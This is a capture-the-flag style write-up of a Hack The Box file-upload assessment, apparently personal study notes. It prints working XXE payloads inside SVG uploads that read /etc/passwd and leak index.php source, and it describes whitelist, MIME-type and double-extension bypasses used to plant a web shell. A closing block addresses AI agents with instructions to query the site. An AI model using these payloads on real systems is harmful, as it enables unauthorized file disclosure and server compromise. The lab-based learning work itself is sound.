# Skills Assessment

* Try to exploit the upload form to read the flag found at the root directory "/".

<figure><img src="/files/z84QRJRUhLQapx9bbCUp" alt=""><figcaption></figcaption></figure>

I can see into the main web a section with name /contact/, in it i can upload a image(screenshot), but i can see into his source code a whitlist -->

<figure><img src="/files/S5yrZOb5c9pXA4cEih06" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/TtPr98vU0lfqgxPRm06Y" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/K1bpDwCeS5va1pGDvzuO" alt=""><figcaption></figcaption></figure>

> Intercept this peticion with burpsuite -->

## XEE

<figure><img src="/files/SWGJUtkkPh0AtpKdsd9Z" alt=""><figcaption></figcaption></figure>

Try to change the extension name with .svg -IT WORK!- Then i need to test the Content-Type of xml - svg

```
cat /usr/share/seclists/Discovery/Web-Content/web-all-content-types.txt | grep svg

image/svg+xml
application/vnd.oipf.dae.svg+xml
```

<figure><img src="/files/2tR2sxEOT1PEBy20qNNo" alt=""><figcaption></figcaption></figure>

Into the code, inset xml malicious code -->

```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>
```

<figure><img src="/files/gRNYiOTzsu65FdW4Wmjl" alt=""><figcaption></figcaption></figure>

With it, can use another malicious codes for view for example the index.php of this web -->

```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>
```

<figure><img src="/files/TIyF3nVQv9h7MpRAVMH8" alt=""><figcaption></figcaption></figure>

We can see the content of index.php base64 endoce, with it, we can enumerate anothers endpoint into the web, for example upload.php

<figure><img src="/files/lv1KjzoefhZnGqJ8itt6" alt=""><figcaption></figcaption></figure>

> Decode base64 it

<figure><img src="/files/ElIpyMwIiBNa41SwcWiB" alt=""><figcaption></figcaption></figure>

Allright!! With it we can see, the route of save the files/imgs is `/user_feedback_submissions/`, maybe: `contact/user_feedback_submissions/` with it, too can see the rename of the images save;

```
$fileName = date('ymd') . '_' . basename($_FILES["uploadFile"]["name"]);code
```

> date(ymd) \_ name of upload file

With it, i can test with a simple upload if i can see the picture -->

<figure><img src="/files/eUfzidTZUQsfabkjc0xv" alt=""><figcaption></figcaption></figure>

## WebShell Upload

First again, delete de front restriccions -->

<figure><img src="/files/Yc903leba0QOdSR8I5Tu" alt=""><figcaption></figcaption></figure>

Then, with the burp active, intercept the peticon of upload a image and send to Repeater:

<figure><img src="/files/8RxCRELpWNMFFqIKoBNF" alt=""><figcaption></figcaption></figure>

We can upload a simple webshell code, but... we need test all casuistics of the content-type, magics numbers and extensions.

First, we modify the extension to see which can send -->

<figure><img src="/files/CahXY49VysZK1dMLT3Bo" alt=""><figcaption></figcaption></figure>

> ws.phar.jpg - doble extension nice! We can use the intruder

Second, we need imput malius code, for examen a web shell and try to upload. The safest, we can see a normal webshell and need alterate the content-type and mime type -->

<figure><img src="/files/bhC4nRZrEDKHZ08cRhyS" alt=""><figcaption></figcaption></figure>

> With it, we can see that the content type correct is jpg o jpeg and the Magic Numbers is the yoya of the jpg iamges

To finaly, we can see the content upload and base64 encoded. And with the another vulnerability XXE, we can view the addres to safe the images: `contact/user_feedback_submissions/date(ymd) _ name of upload file` -->

<figure><img src="/files/mIQVIahvb7M7EnCWxopJ" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://eldeim.gitbook.io/brain_fuck/notes/certifications/eastereggs/htb-cbbh/file-upload-attacks/skills-assessment.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.